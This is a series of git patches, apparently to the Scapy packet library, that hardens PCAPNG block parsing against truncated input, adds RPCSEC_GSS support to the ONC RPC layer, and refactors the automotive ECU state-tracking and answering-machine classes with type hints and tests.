struct.unpack(self.endian + "I", block[:4]) + try: + wirelen, = struct.unpack(self.endian + "I", block[:4]) + except struct.error: + warning("PcapNg: SPB is too small %d/4 !" % len(block)) + raise EOFError + caplen = min(wirelen, self.interfaces[intid][1]) return (block[4:4 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 @@ -1563,10 +1570,14 @@ def _read_block_spb(self, block, size): def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """(Obsolete) Packet Block""" - intid, drops, tshigh, tslow, caplen, wirelen = struct.unpack( - self.endian + "HH4I", - block[:20], - ) + try: + intid, drops, tshigh, tslow, caplen, wirelen = struct.unpack( + self.endian + "HH4I", + block[:20], + ) + except struct.error: + warning("PcapNg: PKT is too small %d/20 !" % len(block)) + raise EOFError self._check_interface_id(intid) return (block[20:20 + caplen][:size], diff --git a/test/regression.uts b/test/regression.uts index 26bf1a02cae..a0481aee633 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2011,6 +2011,14 @@ try: except Scapy_Exception: pass +# Invalid SPB in PCAPNG -> raise EOFError +try: + invalid_pcapngfile_4 = BytesIO(b'\n\n\n\x14\x00\x00\x00M<+\x1a \x14\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00 \x14\x00\x00\x00\x03\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x00\x00') + rdpcap(invalid_pcapngfile_4) + assert False +except Scapy_Exception: + pass + = Check PcapWriter on null write f = BytesIO() From 086fb5e5bff13f72c70638cdb1d903f2c2a9324d Mon Sep 17 00:00:00 2001 From: Vincent Tan Date: Tue, 16 Feb 2021 12:34:56 +0800 Subject: [PATCH 0522/1632] Add RPCSEC_GSS for RPC_Call MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit updates add tests Tests for oncrpc module ━ Run Tue Feb 16 15:22:45 2021 from [test/contrib/oncrpc.uts] by UTscapy └ Passed=4 └ Failed=0 --- scapy/contrib/oncrpc.py | 61 +++++++++++++++++++++++++++++++++++++---- test/contrib/oncrpc.uts | 24 ++++++++++++++++ 2 files changed, 80 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/oncrpc.py b/scapy/contrib/oncrpc.py index f12394ea97b..29fbb50eb60 100644 --- a/scapy/contrib/oncrpc.py +++ b/scapy/contrib/oncrpc.py @@ -7,7 +7,7 @@ # scapy.contrib.status = loads from scapy.fields import XIntField, IntField, IntEnumField, StrLenField, \ - FieldListField, ConditionalField, PacketField + FieldListField, ConditionalField, PacketField, FieldLenField from scapy.packet import Packet, bind_layers import struct @@ -73,6 +73,31 @@ def extract_padding(self, s): return '', s +class Auth_RPCSEC_GSS(Packet): + name = 'Auth RPCSEC_GSS' + fields_desc = [ + IntField('gss_version', 0), + IntField('gss_procedure', 0), + IntField('gss_seq_num', 0), + IntField('gss_service', 0), + PacketField('gss_context', Object_Name(), Object_Name) + ] + + def extract_padding(self, s): + return '', s + + +class Verifier_RPCSEC_GSS(Packet): + name = 'Verifier RPCSEC_GSS' + fields_desc = [ + FieldLenField("len", None, length_of="data"), + StrLenField("data", "", length_from=lambda pkt:pkt.len) + ] + + def extract_padding(self, s): + return '', s + + class RPC_Call(Packet): name = 'RPC Call' @@ -81,17 +106,38 @@ class RPC_Call(Packet): IntField('program', 100003), IntField('pversion', 3), IntField('procedure', 0), - IntEnumField('aflavor', 1, {0: 'AUTH_NULL', 1: 'AUTH_UNIX'}), + IntEnumField( + 'aflavor', 1, + {0: 'AUTH_NULL', 1: 'AUTH_UNIX', 6: 'RPCSEC_GSS'} + ), IntField('alength', None), ConditionalField( PacketField('a_unix', Auth_Unix(), Auth_Unix), lambda pkt: pkt.aflavor == 1 ), - IntEnumField('vflavor', 0, {0: 'AUTH_NULL', 1: 'AUTH_UNIX'}), - IntField('vlength', None), + ConditionalField( + PacketField('a_rpcsec_gss', Auth_RPCSEC_GSS(), Auth_RPCSEC_GSS), + lambda pkt: pkt.aflavor == 6 + ), + IntEnumField( + 'vflavor', 0, + {0: 'AUTH_NULL', 1: 'AUTH_UNIX', 6: 'RPCSEC_GSS'} + ), + ConditionalField( + IntField('vlength', None), + lambda pkt: pkt.vflavor != 6 + ), ConditionalField( PacketField('v_unix', Auth_Unix(), Auth_Unix), lambda pkt: pkt.vflavor == 1 + ), + ConditionalField( + PacketField( + 'v_rpcsec_gss', + Verifier_RPCSEC_GSS(), + Verifier_RPCSEC_GSS + ), + lambda pkt: pkt.vflavor == 6 ) ] @@ -118,8 +164,13 @@ def post_build(self, pkt, pay): # default will be correct return Packet.post_build(self, pkt, pay) if self.aflavor != 0 and self.alength is None: + if self.aflavor == 6: + pack_len = len(self.a_rpcsec_gss) + else: + pack_len = len(self.a_unix) + pkt = pkt[:20] \ - + struct.pack('!I', len(self.a_unix)) \ + + struct.pack('!I', pack_len) \ + pkt[24:] return Packet.post_build(self, pkt, pay) if self.vflavor != 0 and self.vlength is None: diff --git a/test/contrib/oncrpc.uts b/test/contrib/oncrpc.uts index 1e0a5893c58..32917a76e9c 100644 --- a/test/contrib/oncrpc.uts +++ b/test/contrib/oncrpc.uts @@ -6,6 +6,8 @@ = Create subpackets Object_Name() Auth_Unix() +Auth_RPCSEC_GSS() +Verifier_RPCSEC_GSS() = Create ONC RPC Packets RM_Header() @@ -69,6 +71,28 @@ pkt = RPC_Call( ) assert bytes(pkt) == b'\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00 \xff\xff\xff\xff\x00\x00\x00\x05MNAME\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x05MNAME\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00' +pkt = RPC_Call( + version=2, + program=100021, + pversion=4, + procedure=20, + aflavor='RPCSEC_GSS', + a_rpcsec_gss=Auth_RPCSEC_GSS( + gss_version=1, + gss_procedure=0, + gss_seq_num=10, + gss_service=1, + gss_context=Object_Name( + length=4, + _name='AAAA', + fill='' + ), + ), + vflavor=6, + v_rpcsec_gss=Verifier_RPCSEC_GSS(b"\x00\x00\x00\x04\x41\x41\x41\x41") +) +assert bytes(pkt) == b'\x00\x00\x00\x02\x00\x01\x86\xb5\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00\x18\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x01\x00\x00\x00\x04\x41\x41\x41\x41\x00\x00\x00\x06\x00\x00\x00\x04\x41\x41\x41\x41' + pkt = RPC_Reply( reply_stat=1, flavor=1, From 6231668b9ba72956dd5549f88c9ef90b8a330a6d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 8 Mar 2021 19:01:39 +0100 Subject: [PATCH 0523/1632] Split #3054: Update of Ecu, EcuResponse, EcuSession and EcuAnsweringMachine. Including typing (#3099) * Split #3054: Update of Ecu, EcuResponse, EcuSession and EcuAnsweringMachine. Including typing * Update documentation * fix obdscanner tests * Update documentation * update test * update test and docs * make api-doc more nice * update codespell * major cleanup * fix code spell * fix docs build * apply feedback * cleanup * fix typing * fix typing --- .config/mypy/mypy_enabled.txt | 5 + scapy/compat.py | 3 + scapy/contrib/automotive/ecu.py | 637 +++++++++++------- scapy/contrib/automotive/gm/gmlan.py | 158 ----- .../contrib/automotive/gm/gmlan_ecu_states.py | 36 + scapy/contrib/automotive/gm/gmlan_logging.py | 209 ++++++ scapy/contrib/automotive/uds.py | 251 +------ scapy/contrib/automotive/uds_ecu_states.py | 50 ++ scapy/contrib/automotive/uds_logging.py | 323 +++++++++ scapy/contrib/isotp.py | 1 + test/contrib/automotive/ecu.uts | 306 +++++---- test/contrib/automotive/ecu_am.uts | 89 ++- test/contrib/automotive/gm/gmlan.uts | 22 +- test/contrib/automotive/obd/scanner.uts | 152 +++-- test/contrib/automotive/uds.uts | 33 +- test/tools/obdscanner.uts | 36 +- 16 files changed, 1409 insertions(+), 902 deletions(-) create mode 100644 scapy/contrib/automotive/gm/gmlan_ecu_states.py create mode 100644 scapy/contrib/automotive/gm/gmlan_logging.py create mode 100644 scapy/contrib/automotive/uds_ecu_states.py create mode 100644 scapy/contrib/automotive/uds_logging.py diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 101113e2fae..e7409599da1 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -39,6 +39,11 @@ scapy/layers/l2.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py +scapy/contrib/automotive/ecu.py scapy/contrib/automotive/gm/gmlanutils.py +scapy/contrib/automotive/gm/gmlan_ecu_states.py +scapy/contrib/automotive/gm/gmlan_logging.py +scapy/contrib/automotive/uds_ecu_states.py +scapy/contrib/automotive/uds_logging.py scapy/contrib/automotive/bmw/hsfz.py scapy/contrib/automotive/doip.py diff --git a/scapy/compat.py b/scapy/compat.py index eef758fd08d..08b3df3392a 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -28,6 +28,7 @@ 'Dict', 'Generic', 'IO', + 'Iterable', 'Iterator', 'List', 'Literal', @@ -122,6 +123,7 @@ def __repr__(self): DefaultDict, Dict, Generic, + Iterable, Iterator, IO, List, @@ -151,6 +153,7 @@ def cast(_type, obj): # type: ignore collections.defaultdict) Dict = _FakeType("Dict", dict) # type: ignore Generic = _FakeType("Generic") + Iterable = _FakeType("Iterable") # type: ignore Iterator = _FakeType("Iterator") # type: ignore IO = _FakeType("IO") # type: ignore List = _FakeType("List", list) # type: ignore diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 3cda649b491..4616ede228e 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -10,17 +10,20 @@ import time import random +import copy from collections import defaultdict from types import GeneratorType -from scapy.compat import Any, cast, Dict +from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ + Tuple, Type, cast, Dict, orb from scapy.packet import Raw, Packet from scapy.plist import PacketList -from scapy.error import Scapy_Exception from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine from scapy.config import conf +from scapy.supersocket import SuperSocket + __all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", "EcuAnsweringMachine"] @@ -33,7 +36,7 @@ class EcuState(object): A EcuState supports comparison and serialization (command()). """ def __init__(self, **kwargs): - # type: (Dict[str, Any]) -> None + # type: (Any) -> None for k, v in kwargs.items(): if isinstance(v, GeneratorType): v = list(v) @@ -135,281 +138,434 @@ def command(self): ["%s=%s" % (k, repr(v)) for k, v in sorted( self.__dict__.items(), key=lambda t: t[0])]) + ")" - -class Ecu(object): - """A ECU object can be used to - - track the states of an ECU. - - to log all modification to an ECU - - to extract supported responses of a real ECU - - Usage: - >>> print("This ecu logs, tracks and creates supported responses") - >>> my_virtual_ecu = Ecu() - >>> my_virtual_ecu.update(PacketList([...])) - >>> my_virtual_ecu.supported_responses - >>> print("Another ecu just tracks") - >>> my_tracking_ecu = Ecu(logging=False, store_supported_responses=False) # noqa: E501 - >>> my_tracking_ecu.update(PacketList([...])) - >>> print("Another ecu just logs all modifications to it") - >>> my_logging_ecu = Ecu(verbose=False, store_supported_responses=False) # noqa: E501 - >>> my_logging_ecu.update(PacketList([...])) - >>> my_logging_ecu.log - >>> print("Another ecu just creates supported responses") - >>> my_response_ecu = Ecu(verbose=False, logging=False) - >>> my_response_ecu.update(PacketList([...])) - >>> my_response_ecu.supported_responses - """ - def __init__(self, init_session=None, init_security_level=None, - init_communication_control=None, logging=True, verbose=True, - store_supported_responses=True): + @staticmethod + def extend_pkt_with_modifier(cls): + # type: (Type[Packet]) -> Callable[[Callable[[Packet, Packet, EcuState], None]], None] # noqa: E501 """ - Initialize an Ecu object - - :param init_session: An initial session - :param init_security_level: An initial security level - :param init_communication_control: An initial communication control - setting - :param logging: Turn logging on or off. Default is on. - :param verbose: Turn tracking on or off. Default is on. - :param store_supported_responses: Turn creation of supported responses - on or off. Default is on. + Decorator to add a function as 'modify_ecu_state' method to a given + class. This allows dynamic modifications and additions to a protocol. + :param cls: A packet class to be modified + :return: Decorator function """ - self.state = EcuState( - session=init_session or 1, security_level=init_security_level or 0, - communication_control=init_communication_control or 0) - self.verbose = verbose - self.logging = logging - self.store_supported_responses = store_supported_responses - self.log = defaultdict(list) - self._supported_responses = list() - self._unanswered_packets = PacketList() + def decorator_function(f): + # type: (Callable[[Packet, Packet, EcuState], None]) -> None + setattr(cls, "modify_ecu_state", f) - @property - def current_session(self): - return self.state.session + return decorator_function - @current_session.setter - def current_session(self, ses): - self.state.session = ses + @staticmethod + def is_modifier_pkt(pkt): + # type: (Packet) -> bool + """ + Helper function to determine if a Packet contains a layer that + modifies the EcuState. + :param pkt: Packet to be analyzed + :return: True if pkt contains layer that implements modify_ecu_state + """ + return any(hasattr(layer, "modify_ecu_state") + for layer in pkt.layers()) - @property - def current_security_level(self): - return self.state.security_level + @staticmethod + def get_modified_ecu_state(response, request, state, modify_in_place=False): # noqa: E501 + # type: (Packet, Packet, EcuState, bool) -> EcuState + """ + Helper function to get a modified EcuState from a Packet and a + previous EcuState. An EcuState is always modified after a response + Packet is received. In some protocols, the belonging request packet + is necessary to determine the precise state of the Ecu + + :param response: Response packet that supports `modify_ecu_state` + :param request: Belonging request of the response that modifies Ecu + :param state: The previous/current EcuState + :param modify_in_place: If True, the given EcuState will be modified + :return: The modified EcuState or a modified copy + """ + if modify_in_place: + new_state = state + else: + new_state = copy.copy(state) - @current_security_level.setter - def current_security_level(self, sec): - self.state.security_level = sec + for layer in response.layers(): + if not hasattr(layer, "modify_ecu_state"): + continue + try: + layer.modify_ecu_state(response, request, new_state) + except TypeError: + layer.modify_ecu_state.im_func(response, request, new_state) + return new_state - @property - def communication_control(self): - return self.state.communication_control - @communication_control.setter - def communication_control(self, cc): - self.state.communication_control = cc +class Ecu(object): + """An Ecu object can be used to + * track the states of an Ecu. + * to log all modification to an Ecu. + * to extract supported responses of a real Ecu. + + Example: + >>> print("This ecu logs, tracks and creates supported responses") + >>> my_virtual_ecu = Ecu() + >>> my_virtual_ecu.update(PacketList([...])) + >>> my_virtual_ecu.supported_responses + >>> print("Another ecu just tracks") + >>> my_tracking_ecu = Ecu(logging=False, store_supported_responses=False) + >>> my_tracking_ecu.update(PacketList([...])) + >>> print("Another ecu just logs all modifications to it") + >>> my_logging_ecu = Ecu(verbose=False, store_supported_responses=False) + >>> my_logging_ecu.update(PacketList([...])) + >>> my_logging_ecu.log + >>> print("Another ecu just creates supported responses") + >>> my_response_ecu = Ecu(verbose=False, logging=False) + >>> my_response_ecu.update(PacketList([...])) + >>> my_response_ecu.supported_responses + + Parameters to initialize an Ecu object + + :param logging: Turn logging on or off. Default is on. + :param verbose: Turn tracking on or off. Default is on. + :param store_supported_responses: Create a list of supported responses if True. + :param lookahead: Configuration for lookahead when computing supported responses + """ # noqa: E501 + def __init__(self, logging=True, verbose=True, + store_supported_responses=True, lookahead=10): + # type: (bool, bool, bool, int) -> None + self.state = EcuState() + self.verbose = verbose + self.logging = logging + self.store_supported_responses = store_supported_responses + self.lookahead = lookahead + self.log = defaultdict(list) # type: Dict[str, List[Any]] + self.__supported_responses = list() # type: List[EcuResponse] + self.__unanswered_packets = PacketList() def reset(self): - self.state.reset() - self.state.session = 1 - self.state.security_level = 0 - self.state.communication_control = 0 + # type: () -> None + """ + Resets the internal state to a default EcuState. + """ + self.state = EcuState(session=1) def update(self, p): + # type: (Union[Packet, PacketList]) -> None + """ + Processes a Packet or a list of Packets, according to the chosen + configuration. + :param p: Packet or list of Packets + """ if isinstance(p, PacketList): for pkt in p: - self._update(pkt) + self.update(pkt) elif not isinstance(p, Packet): - raise Scapy_Exception("Provide a Packet object for an update") + raise TypeError("Provide a Packet object for an update") else: - self._update(p) + self.__update(p) - def _update(self, pkt): + def __update(self, pkt): + # type: (Packet) -> None + """ + Processes a Packet according to the chosen configuration. + :param pkt: Packet to be processed + """ if self.verbose: print(repr(self), repr(pkt)) - if self.store_supported_responses: - self._update_supported_responses(pkt) if self.logging: - self._update_log(pkt) - self._update_internal_state(pkt) + self.__update_log(pkt) + self.__update_supported_responses(pkt) - def _update_log(self, pkt): + def __update_log(self, pkt): + # type: (Packet) -> None + """ + Checks if a packet or a layer of this packet supports the function + `get_log`. If `get_log` is supported, this function will be executed + and the returned log information is stored in the intern log of this + Ecu object. + :param pkt: A Packet to be processed for log information. + """ for layer in pkt.layers(): - if hasattr(layer, "get_log"): + if not hasattr(layer, "get_log"): + continue + try: log_key, log_value = layer.get_log(pkt) - self.log[log_key].append((pkt.time, log_value)) + except TypeError: + log_key, log_value = layer.get_log.im_func(pkt) - def _update_internal_state(self, pkt): - for layer in pkt.layers(): - if hasattr(layer, "modifies_ecu_state"): - layer.modifies_ecu_state(pkt, self) - - def _update_supported_responses(self, pkt): - self._unanswered_packets += PacketList([pkt]) - answered, unanswered = self._unanswered_packets.sr() - for _, resp in answered: - ecu_resp = EcuResponse(session=self.current_session, - security_level=self.current_security_level, - responses=resp) - - if ecu_resp not in self._supported_responses: - if self.verbose: - print("[+] ", repr(ecu_resp)) - self._supported_responses.append(ecu_resp) - else: - if self.verbose: - print("[-] ", repr(ecu_resp)) - self._unanswered_packets = unanswered + self.log[log_key].append((pkt.time, log_value)) + + def __update_supported_responses(self, pkt): + # type: (Packet) -> None + """ + Stores a given packet as supported response, if a matching request + packet is found in a list of the latest unanswered packets. For + performance improvements, this list of unanswered packets only contains + a fixed number of packets, defined by the `lookahead` parameter of + this Ecu. + :param pkt: Packet to be processed. + """ + self.__unanswered_packets.append(pkt) + reduced_plist = self.__unanswered_packets[-self.lookahead:] + answered, unanswered = reduced_plist.sr(lookahead=self.lookahead) + self.__unanswered_packets = unanswered + + for req, resp in answered: + added = False + current_state = copy.copy(self.state) + EcuState.get_modified_ecu_state(resp, req, self.state, True) + + if not self.store_supported_responses: + continue + + for sup_resp in self.__supported_responses: + if resp == sup_resp.key_response: + if sup_resp.states is not None and \ + self.state not in sup_resp.states: + sup_resp.states.append(current_state) + added = True + break + + if added: + continue + + ecu_resp = EcuResponse(current_state, responses=resp) + if self.verbose: + print("[+] ", repr(ecu_resp)) + self.__supported_responses.append(ecu_resp) + + @staticmethod + def sort_key_func(resp): + # type: (EcuResponse) -> Tuple[bool, int, int, int] + """ + This sorts responses in the following order: + 1. Positive responses first + 2. Lower ServiceIDs first + 3. Less supported states first + 4. Longer (more specific) responses first + :param resp: EcuResponse to be sorted + :return: Tuple as sort key + """ + first_layer = cast(Packet, resp.key_response[0]) # type: ignore + service = orb(bytes(first_layer)[0]) + return (service == 0x7f, + service, + 0xffffffff - len(resp.states or []), + 0xffffffff - len(resp.key_response)) @property def supported_responses(self): - # This sorts responses in the following order: - # 1. Positive responses first - # 2. Lower ServiceID first - # 3. Longer (more specific) responses first - self._supported_responses.sort( - key=lambda x: (x.responses[0].service == 0x7f, - x.responses[0].service, - 0xffffffff - len(x.responses[0]))) - return self._supported_responses + # type: () -> List[EcuResponse] + """ + Returns a sorted list of supported responses. The sort is done in a way + to provide the best possible results, if this list of supported + responses is used to simulate an real world Ecu with the + EcuAnsweringMachine object. + :return: + """ + self.__supported_responses.sort(key=self.sort_key_func) + return self.__supported_responses @property def unanswered_packets(self): - return self._unanswered_packets + # type: () -> PacketList + """ + A list of all unanswered packets, which were processed by this Ecu + object. + :return: PacketList of unanswered packets + """ + return self.__unanswered_packets def __repr__(self): - return "ses: %03d sec: %03d cc: %d" % (self.current_session, - self.current_security_level, - self.communication_control) + # type: () -> str + return repr(self.state) + @staticmethod + def extend_pkt_with_logging(cls): + # type: (Type[Packet]) -> Callable[[Callable[[Packet], Tuple[str, Any]]], None] # noqa: E501 + """ + Decorator to add a function as 'get_log' method to a given + class. This allows dynamic modifications and additions to a protocol. + :param cls: A packet class to be modified + :return: Decorator function + """ -class EcuSession(DefaultSession): - """Tracks modification to an Ecu 'on-the-flow'. + def decorator_function(f): + # type: (Callable[[Packet], Tuple[str, Any]]) -> None + setattr(cls, "get_log", f) - Usage: - >>> sniff(session=EcuSession) + return decorator_function + + +class EcuSession(DefaultSession): """ + Tracks modification to an Ecu object 'on-the-flow'. + + The parameters for the internal Ecu object are obtained from the kwargs + dict. + + `logging`: Turn logging on or off. Default is on. + `verbose`: Turn tracking on or off. Default is on. + `store_supported_responses`: Create a list of supported responses, if True. + Example: + >>> sniff(session=EcuSession) + + """ def __init__(self, *args, **kwargs): + # type: (Any, Any) -> None DefaultSession.__init__(self, *args, **kwargs) - self.ecu = Ecu(init_session=kwargs.pop("init_session", None), - init_security_level=kwargs.pop("init_security_level", None), # noqa: E501 - init_communication_control=kwargs.pop("init_communication_control", None), # noqa: E501 - logging=kwargs.pop("logging", True), + self.ecu = Ecu(logging=kwargs.pop("logging", True), verbose=kwargs.pop("verbose", True), store_supported_responses=kwargs.pop("store_supported_responses", True)) # noqa: E501 def on_packet_received(self, pkt): + # type: (Optional[Packet]) -> None if not pkt: return - if isinstance(pkt, list): - for p in pkt: - EcuSession.on_packet_received(self, p) - return self.ecu.update(pkt) DefaultSession.on_packet_received(self, pkt) class EcuResponse: - """Encapsulates a response and the according Ecu state. - A list of this objects can be used to configure a Ecu Answering Machine. - This is useful, if you want to clone the behaviour of a real Ecu on a bus. - - Usage: - >>> print("Generates a EcuResponse which answers on UDS()/UDS_RDBI(identifiers=[2]) if Ecu is in session 2 and has security_level 2") # noqa: E501 - >>> EcuResponse(session=2, security_level=2, responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1")) # noqa: E501 - >>> print("Further examples") - >>> EcuResponse(session=range(3,5), security_level=[3,4], responses=UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"deadbeef2")) # noqa: E501 - >>> EcuResponse(session=[5,6,7], security_level=range(5,7), responses=UDS()/UDS_RDBIPR(dataIdentifier=5)/Raw(b"deadbeef3")) # noqa: E501 - >>> EcuResponse(session=lambda x: 8 < x <= 10, security_level=lambda x: x > 10, responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4")) # noqa: E501 - """ - def __init__(self, session=1, security_level=0, - responses=Raw(b"\x7f\x10"), - answers=None): - """ - Initialize an EcuResponse capsule - - :param session: Defines the session in which this response is valid. - A integer, a callable or any iterable object can be - provided. - :param security_level: Defines the security_level in which this - response is valid. A integer, a callable or any - iterable object can be provided. - :param responses: A Packet or a list of Packet objects. By default the - last packet is asked if it answers a incoming packet. - This allows to send for example - `requestCorrectlyReceived-ResponsePending` packets. - :param answers: Optional argument to provide a custom answer here: - `lambda resp, req: return resp.answers(req)` - This allows the modification of a response depending - on a request. Custom SecurityAccess mechanisms can - be implemented in this way or generic NegativeResponse - messages which answers to everything can be realized - in this way. - """ - self.__session = session \ - if hasattr(session, "__iter__") or callable(session) else [session] - self.__security_level = security_level \ - if hasattr(security_level, "__iter__") or callable(security_level)\ - else [security_level] + """Encapsulates responses and the according EcuStates. + A list of this objects can be used to configure an EcuAnsweringMachine. + This is useful, if you want to clone the behaviour of a real Ecu. + + Example: + >>> EcuResponse(EcuState(session=2, security_level=2), responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1")) + >>> EcuResponse([EcuState(session=range(2, 5), security_level=2), EcuState(session=3, security_level=5)], responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4")) + + Initialize an EcuResponse capsule + + :param state: EcuState or list of EcuStates in which this response + is allowed to be sent. If no state provided, the response + packet will always be send. + :param responses: A Packet or a list of Packet objects. By default the + last packet is asked if it answers an incoming + packet. This allows to send for example + `requestCorrectlyReceived-ResponsePending` packets. + :param answers: Optional argument to provide a custom answer here: + `lambda resp, req: return resp.answers(req)` + This allows the modification of a response depending + on a request. Custom SecurityAccess mechanisms can + be implemented in this way or generic NegativeResponse + messages which answers to everything can be realized + in this way. + """ # noqa: E501 + def __init__(self, state=None, responses=Raw(b"\x7f\x10"), answers=None): + # type: (Optional[Union[EcuState, Iterable[EcuState]]], Union[Iterable[Packet], PacketList, Packet], Optional[Callable[[Packet, Packet], bool]]) -> None # noqa: E501 + if state is None: + self.__states = None # type: Optional[List[EcuState]] + else: + if hasattr(state, "__iter__"): + state = cast(List[EcuState], state) + self.__states = state + else: + state = cast(EcuState, state) + self.__states = [state] + if isinstance(responses, PacketList): - self.responses = responses + self.__responses = responses # type: PacketList elif isinstance(responses, Packet): - self.responses = PacketList([responses]) + self.__responses = PacketList([responses]) elif hasattr(responses, "__iter__"): - self.responses = PacketList(responses) + responses = cast(List[Packet], responses) + self.__responses = PacketList(responses) else: - self.responses = PacketList([responses]) + raise TypeError( + "Can't handle type %s as response" % type(responses)) self.__custom_answers = answers - def in_correct_session(self, current_session): - if callable(self.__session): - return self.__session(current_session) - else: - return current_session in self.__session + @property + def states(self): + # type: () -> Optional[List[EcuState]] + return self.__states + + @property + def responses(self): + # type: () -> PacketList + return self.__responses + + @property + def key_response(self): + # type: () -> Packet + pkt = self.__responses[-1] # type: Packet + return pkt - def has_security_access(self, current_security_level): - if callable(self.__security_level): - return self.__security_level(current_security_level) + def supports_state(self, state): + # type: (EcuState) -> bool + if self.__states is None or len(self.__states) == 0: + return True else: - return current_security_level in self.__security_level + return any(s == state or state in s for s in self.__states) def answers(self, other): + # type: (Packet) -> Union[int, bool] if self.__custom_answers is not None: - return self.__custom_answers(self.responses[-1], other) + return self.__custom_answers(self.key_response, other) else: - return self.responses[-1].answers(other) + return self.key_response.answers(other) def __repr__(self): - return "session=%s, security_level=%s, responses=%s" % \ - (self.__session, self.__security_level, - [resp.summary() for resp in self.responses]) + # type: () -> str + return "%s, responses=%s" % \ + (repr(self.__states), + [resp.summary() for resp in self.__responses]) def __eq__(self, other): - return \ - self.__class__ == other.__class__ and \ - self.__session == other.__session and \ - self.__security_level == other.__security_level and \ + # type: (object) -> bool + other = cast(EcuResponse, other) + + responses_equal = \ len(self.responses) == len(other.responses) and \ all(bytes(x) == bytes(y) for x, y in zip(self.responses, other.responses)) + if self.__states is None: + return responses_equal + else: + return any(other.supports_state(s) for s in self.__states) and \ + responses_equal def __ne__(self, other): + # type: (object) -> bool # Python 2.7 compat return not self == other - __hash__ = None + def command(self): + # type: () -> str + if self.__states is not None: + return "EcuResponse(%s, responses=%s)" % ( + "[" + ", ".join(s.command() for s in self.__states) + "]", + "[" + ", ".join(p.command() for p in self.__responses) + "]") + else: + return "EcuResponse(responses=%s)" % "[" + ", ".join( + p.command() for p in self.__responses) + "]" + + __hash__ = None # type: ignore conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0} class EcuAnsweringMachine(AnsweringMachine): - """AnsweringMachine which emulates the basic behaviour of a real world Ecu. - Provide a list of ``ECUResponse`` objects to configure the behaviour of this + """AnsweringMachine which emulates the basic behaviour of a real world ECU. + Provide a list of ``EcuResponse`` objects to configure the behaviour of a AnsweringMachine. - :param supported_responses: List of ``ECUResponse`` objects to define + Usage: + >>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10)) + >>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS) + >>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS) + >>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5}) + >>> sim.start() + """ # noqa: E501 + function_name = "EcuAnsweringMachine" + sniff_options_list = ["store", "opened_socket", "count", "filter", "prn", + "stop_filter", "timeout"] + + def parse_options(self, supported_responses=None, + main_socket=None, broadcast_socket=None, basecls=Raw, + timeout=None): + # type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]]) -> None # noqa: E501 + """ + :param supported_responses: List of ``EcuResponse`` objects to define the behaviour. The default response is ``generalReject``. :param main_socket: Defines the object of the socket to send @@ -418,69 +574,84 @@ class EcuAnsweringMachine(AnsweringMachine): Listen-only, responds with the main_socket. `None` to disable broadcast capabilities. :param basecls: Provide a basecls of the used protocol - - Usage: - >>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10)) # noqa: E501 - >>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS) # noqa: E501 - >>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS) # noqa: E501 - >>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5}) # noqa: E501 - >>> sim.start() - """ - function_name = "EcuAnsweringMachine" - sniff_options_list = ["store", "opened_socket", "count", "filter", "prn", "stop_filter", "timeout"] # noqa: E501 - - def parse_options(self, supported_responses=None, - main_socket=None, broadcast_socket=None, basecls=Raw, - timeout=None): - self.main_socket = main_socket - self.sockets = [self.main_socket] + :param timeout: Specifies the timeout for sniffing in seconds. + """ + self.__ecu_state = EcuState(session=1) + # TODO: Apply a cleanup of the initial EcuStates. Maybe provide a way + # to overwrite EcuState.reset to allow the manipulation of the + # initial (default) EcuState. + self.__main_socket = main_socket # type: Optional[SuperSocket] + self.__sockets = [self.__main_socket] if broadcast_socket is not None: - self.sockets.append(broadcast_socket) + self.__sockets.append(broadcast_socket) - self.ecu_state = Ecu(logging=False, verbose=False, - store_supported_responses=False) - self.basecls = basecls - self.supported_responses = supported_responses 